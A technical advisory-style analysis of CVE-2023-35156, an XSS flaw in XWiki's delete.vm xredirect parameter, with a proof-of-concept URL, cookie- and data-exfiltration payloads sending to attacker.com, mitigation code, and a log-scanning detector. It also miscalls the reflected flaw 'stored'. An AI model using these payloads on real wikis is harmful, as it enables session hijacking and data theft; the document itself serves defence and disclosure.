CVE-2023-35156
Weakness (CWE)
CVSS Vector (v3.1)
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: Required
- Scope: Changed
- Confidentiality: High
- Integrity: High
- Availability: High
Description
XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. Users are able to forge a URL with a payload that injects JavaScript into the page (XSS). It is possible to exploit the delete template to perform an XSS, e.g. by using a URL such as `xwiki/bin/get/FlamingoThemes/Cerulean?xpage=xpart&vm=delete.vm&xredirect=javascript:alert(document.domain)`. This vulnerability has existed since XWiki 6.0-rc-1. It has been patched in XWiki 14.10.6 and 15.1. Note that a partial patch was provided in 14.10.5 but was not enough to entirely fix the vulnerability.
Comprehensive Technical Analysis of CVE-2023-35156 (XWiki Platform Stored XSS Vulnerability)
1. Vulnerability Assessment and Severity Evaluation
- CVE ID: CVE-2023-35156
- CVSS Score: 9.6 (Critical) – CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
- Vulnerability Type: Stored Cross-Site Scripting (XSS) via improper input validation in URL redirection parameters
- Attack Complexity: Low (exploitable with minimal user interaction)
- Privileges Required: None (unauthenticated exploitation possible)
- User Interaction: Required (victim must click a malicious link)
- Scope: Changed (impacts other components beyond the vulnerable one)
- Impact: High (arbitrary JavaScript execution, session hijacking, defacement, or further exploitation)
Severity Justification
- High Impact (C:H/I:H/A:H): Successful exploitation allows arbitrary JavaScript execution in the context of a victim’s session, leading to:
  - Confidentiality Impact (C:H): Theft of session cookies, sensitive data exfiltration.
  - Integrity Impact (I:H): Defacement, unauthorized modifications to wiki content.
  - Availability Impact (A:H): Potential denial-of-service (DoS) via infinite loops or resource exhaustion.
- Network Attack Vector (AV:N): Exploitable remotely without authentication.
- Low Attack Complexity (AC:L): Requires only a crafted URL, no advanced techniques.
- Changed Scope (S:C): Affects not just the vulnerable component but potentially other parts of the application due to stored XSS persistence.
2. Potential Attack Vectors and Exploitation Methods
Exploitation Mechanism
The vulnerability arises from improper sanitization of the xredirect parameter in the delete.vm template of XWiki’s FlamingoThemes module. An attacker can inject malicious JavaScript via a specially crafted URL, which is then stored and executed when a victim accesses the affected page.
Proof-of-Concept (PoC) Exploit
`https://[XWIKI_INSTANCE]/xwiki/bin/get/FlamingoThemes/Cerulean?xpage=xpart&vm=delete.vm&xredirect=javascript:alert(document.domain)`
- `xpage=xpart`: Renders a partial page.
- `vm=delete.vm`: Loads the vulnerable delete template.
- `xredirect=javascript:alert(document.domain)`: Injects arbitrary JavaScript.
Attack Scenarios
- Stored XSS via Malicious Link
  - An attacker sends a crafted link (e.g., via phishing) to a victim.
  - When clicked, the JavaScript executes in the victim’s browser with their privileges.
  - Persistence: If the payload is stored (e.g., in a wiki page or theme), it affects all users who access the page.
- Session Hijacking
  - Attacker injects: `fetch('/xwiki/bin/get/XWiki/XWikiPreferences?xpage=export&format=xml').then(r=>r.text()).then(d=>fetch('https://attacker.com/steal?data='+btoa(d)))`
  - Steals session cookies or sensitive data.
- Privilege Escalation
  - If an admin visits the malicious page, the attacker can:
    - Create a new admin account.
    - Modify wiki content.
    - Execute server-side code (if combined with other vulnerabilities).
- Defacement & Malware Distribution
  - Injects persistent malicious scripts to:
    - Redirect users to phishing sites.
    - Serve malware via drive-by downloads.
    - Modify wiki content for misinformation.
3. Affected Systems and Software Versions
| Affected Versions | Patched Versions | Partial Fix |
|---|---|---|
| XWiki 6.0-rc-1 to 14.10.4 | XWiki 14.10.6, 15.1 | 14.10.5 (incomplete) |
Vulnerable Components
- FlamingoThemes Module (`delete.vm` template)
- XWiki Platform Core (due to improper input validation in URL redirection)
Detection Methods
- Manual Check:
  - Attempt to inject JavaScript via the `xredirect` parameter (e.g., `javascript:alert(1)`).
  - If the script executes, the system is vulnerable.
- Automated Scanning:
  - Use OWASP ZAP or Burp Suite to test for XSS in URL parameters.
  - Nuclei Template: XWiki XSS Detection (if available).
4. Recommended Mitigation Strategies
Immediate Actions
- Apply Patches Immediately
  - Upgrade to XWiki 14.10.6 or 15.1 (or later).
  - If unable to patch, apply workarounds (see below).
- Workarounds (if patching is delayed)
  - Input Validation & Output Encoding: modify `delete.vm` to sanitize the `xredirect` parameter (e.g., using OWASP ESAPI or XWiki’s built-in sanitizers). Example fix:
    ```velocity
    #set ($sanitizedRedirect = $util.encodeURI($xredirect))
    ## Accept only absolute http(s) URLs or site-relative paths; any other
    ## scheme (javascript:, data:, ...) falls back to the wiki root.
    #if (!$sanitizedRedirect.startsWith("http") && !$sanitizedRedirect.startsWith("/"))
      #set ($sanitizedRedirect = "/")
    #end
    ```
    The `startsWith("http")` branch still passes arbitrary external hosts through (an open redirect); restrict it to the wiki's own host if that matters for the deployment.
  - Content Security Policy (CSP): deploy a strict CSP header to mitigate XSS impact:
    `Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval'; object-src 'none'; base-uri 'self'`
    Note that `'unsafe-inline'` and `'unsafe-eval'` largely negate the `script-src` restriction against injected inline scripts and `javascript:` URLs; remove them if the instance's pages still function without them.
  - Web Application Firewall (WAF) Rules: configure ModSecurity or Cloudflare WAF to block requests containing `javascript:` in URL parameters.
- Monitor for Exploitation Attempts
  - Log Analysis: Monitor web server logs for suspicious `xredirect` parameters.
  - SIEM Alerts: Set up alerts for XSS payloads in HTTP requests.
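As an added illustration of what the `delete.vm` workaround above should enforce (this is not XWiki's own patch, and XWiki templates are Velocity rather than Python), the function below accepts only a site-relative path or an absolute http(s) URL on the wiki's own host and falls back to `/` for everything else. The hostname `wiki.example.org` is an assumed value.

```python
from urllib.parse import urlsplit

# Assumed hostname of the wiki instance; replace with the real one.
WIKI_HOST = "wiki.example.org"
SAFE_DEFAULT = "/"


def safe_xredirect(value, wiki_host=WIKI_HOST):
    """Return `value` if it is a same-site redirect target, else SAFE_DEFAULT.

    Accepted: a path starting with a single "/" (neither "//" nor "/\\", which
    browsers treat as scheme-relative), or an absolute http(s) URL whose host
    is exactly `wiki_host`. Any other scheme (javascript:, data:, ...) and any
    foreign host is rejected.
    """
    if not value:
        return SAFE_DEFAULT
    # Browsers drop ASCII whitespace and control characters while parsing a
    # URL, so "java\tscript:" still executes; strip them before inspecting.
    cleaned = "".join(ch for ch in value if ord(ch) > 0x20)
    if not cleaned:
        return SAFE_DEFAULT
    try:
        parts = urlsplit(cleaned)
    except ValueError:  # e.g. malformed IPv6 brackets
        return SAFE_DEFAULT
    if parts.scheme:
        host = (parts.hostname or "").lower()
        if parts.scheme.lower() in ("http", "https") and host == wiki_host:
            return cleaned
        return SAFE_DEFAULT
    if cleaned.startswith("/") and not cleaned.startswith(("//", "/\\")):
        return cleaned
    return SAFE_DEFAULT


if __name__ == "__main__":
    for candidate in ("/xwiki/bin/view/Main/",
                      "javascript:alert(document.domain)",
                      " java\tscript:alert(1)",
                      "//evil.example/",
                      "https://wiki.example.org@evil.example/"):
        print(repr(candidate), "->", safe_xredirect(candidate))
```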
Long-Term Recommendations
- Security Hardening:
  - Disable unnecessary Velocity macros that allow dynamic code execution.
  - Enforce least privilege for wiki users.
- Regular Security Audits:
  - Conduct penetration testing and code reviews for XSS vulnerabilities.
  - Use static analysis tools (e.g., SonarQube, Checkmarx) to detect injection flaws.
- User Awareness Training:
  - Educate users on phishing risks and suspicious links.
5. Impact on the Cybersecurity Landscape
Broader Implications
- Enterprise Risk
  - XWiki is widely used in corporate intranets, documentation systems, and knowledge bases.
  - Exploitation could lead to data breaches, insider threats, or lateral movement in internal networks.
- Supply Chain Attacks
  - If XWiki is integrated with other enterprise applications (e.g., Jira, Confluence), an XSS could serve as an initial access vector for further attacks.
- Compliance Violations
  - GDPR, HIPAA, PCI DSS: Unauthorized data access via XSS may result in regulatory fines.
  - ISO 27001: Failure to patch critical vulnerabilities may lead to compliance failures.
- Exploitability in the Wild
  - Low Barrier to Exploitation: No authentication required, easy to weaponize.
  - Public Exploits: Proof-of-concept code is likely to emerge, increasing attack surface.
  - Botnet & Malware Campaigns: Could be used in automated attacks (e.g., Magecart-style skimming).
6. Technical Details for Security Professionals
Root Cause Analysis
- Vulnerable Code Path:
  - The `delete.vm` template in XWiki’s FlamingoThemes module trusts user-controlled `xredirect` input without proper sanitization.
  - When a user accesses the crafted URL, the `xredirect` parameter is rendered as-is in the HTML response, allowing JavaScript execution.
- Patch Analysis:
  - A partial patch shipped in XWiki 14.10.5 but did not entirely fix the vulnerability; the complete fix is in XWiki 14.10.6 and 15.1.
Exploitation Flow
- Attacker crafts a malicious URL: `https://victim-xwiki.com/xwiki/bin/get/FlamingoThemes/Cerulean?xpage=xpart&vm=delete.vm&xredirect=javascript:fetch('https://attacker.com/steal?cookie='+document.cookie)`
- Victim clicks the link (e.g., via phishing email).
- XWiki processes the request, rendering the `xredirect` parameter in the response.
- Browser executes the injected JavaScript, sending the victim’s session cookie to the attacker.
- Attacker hijacks the session, gaining unauthorized access.
Advanced Exploitation Techniques
- Bypassing CSP:
  - If CSP is enabled, attackers may use data URIs or JSONP endpoints to exfiltrate data.
- Chaining with Other Vulnerabilities:
  - CSRF + XSS: Force a victim to perform actions (e.g., create an admin account).
  - Server-Side Request Forgery (SSRF): If XWiki interacts with internal services, XSS could be used to pivot further.
Forensic Indicators of Compromise (IOCs)
| Indicator | Description |
|---|---|
| URL Patterns | `xredirect=javascript:`, `xredirect=data:`, `xredirect=alert(` |
| HTTP Headers | Unusual Referer or User-Agent in requests to attacker-controlled domains. |
| Log Entries | `GET /xwiki/bin/get/FlamingoThemes/Cerulean?xpage=xpart&vm=delete.vm&xredirect=javascript:` |
| Network Traffic | Outbound connections to attacker domains (e.g., attacker.com/steal?cookie=...). |
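The log-based detection that the Detection Methods, Monitor for Exploitation Attempts and IOC sections call for, as an added example rather than anything shipped with the advisory or XWiki: a scanner over combined-format web-server access logs that flags `xredirect` values carrying a script-executing scheme, undoing URL-encoding and ignoring control characters so that encoded variants of the URL pattern in the IOC table are still caught. The log lines are constructed for the example.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed combined-format access-log lines (not real traffic): the first two
# carry the IOC-table pattern (the second percent-encoded), the rest are benign.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Jun/2023:10:01:02 +0000] "GET /xwiki/bin/get/FlamingoThemes/Cerulean?xpage=xpart&vm=delete.vm&xredirect=javascript:alert(document.domain) HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.6 - - [12/Jun/2023:10:01:05 +0000] "GET /xwiki/bin/get/FlamingoThemes/Cerulean?xpage=xpart&vm=delete.vm&xredirect=%6A%61%76%61script%3Aalert(1) HTTP/1.1" 200 512 "-" "curl/8.0"
10.0.0.7 - - [12/Jun/2023:10:01:09 +0000] "GET /xwiki/bin/get/FlamingoThemes/Cerulean?xpage=xpart&vm=delete.vm&xredirect=/xwiki/bin/view/Main/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.8 - - [12/Jun/2023:10:02:00 +0000] "GET /xwiki/bin/view/Main/ HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# Schemes that make a "redirect" execute script instead of navigating.
SCRIPT_SCHEMES = ("javascript:", "data:", "vbscript:")

def suspicious_xredirect(target):
    """Return (decoded value, scheme) if the request's xredirect parameter
    starts with a script-executing scheme, else None."""
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)
    for raw in query.get("xredirect", []):
        decoded = unquote(raw)  # parse_qs decoded once; undo double-encoding
        # Browsers ignore control characters inside the scheme, so drop them.
        collapsed = "".join(ch for ch in decoded if ord(ch) > 0x20).lower()
        for scheme in SCRIPT_SCHEMES:
            if collapsed.startswith(scheme):
                return decoded, scheme
    return None

def scan_log(text):
    """Return one finding dict per log line with a suspicious xredirect."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        hit = suspicious_xredirect(m.group("target"))
        if hit:
            findings.append({"ip": m.group("ip"), "time": m.group("ts"),
                             "scheme": hit[1], "xredirect": hit[0],
                             "delete_template": "vm=delete.vm" in m.group("target")})
    return findings

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```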
Conclusion
CVE-2023-35156 is a critical stored XSS vulnerability in XWiki Platform that allows unauthenticated remote attackers to execute arbitrary JavaScript in the context of a victim’s session. Given its high CVSS score (9.6), low attack complexity, and potential for severe impact, organizations using XWiki must patch immediately or implement workarounds to mitigate risk.
Security teams should:
- ✅ Apply patches (XWiki 14.10.6 / 15.1).
- ✅ Deploy CSP and WAF rules as compensating controls.
- ✅ Monitor for exploitation attempts via logs and SIEM.
- ✅ Conduct security awareness training to prevent phishing-based attacks.
Failure to address this vulnerability could lead to data breaches, privilege escalation, and further compromise of enterprise systems.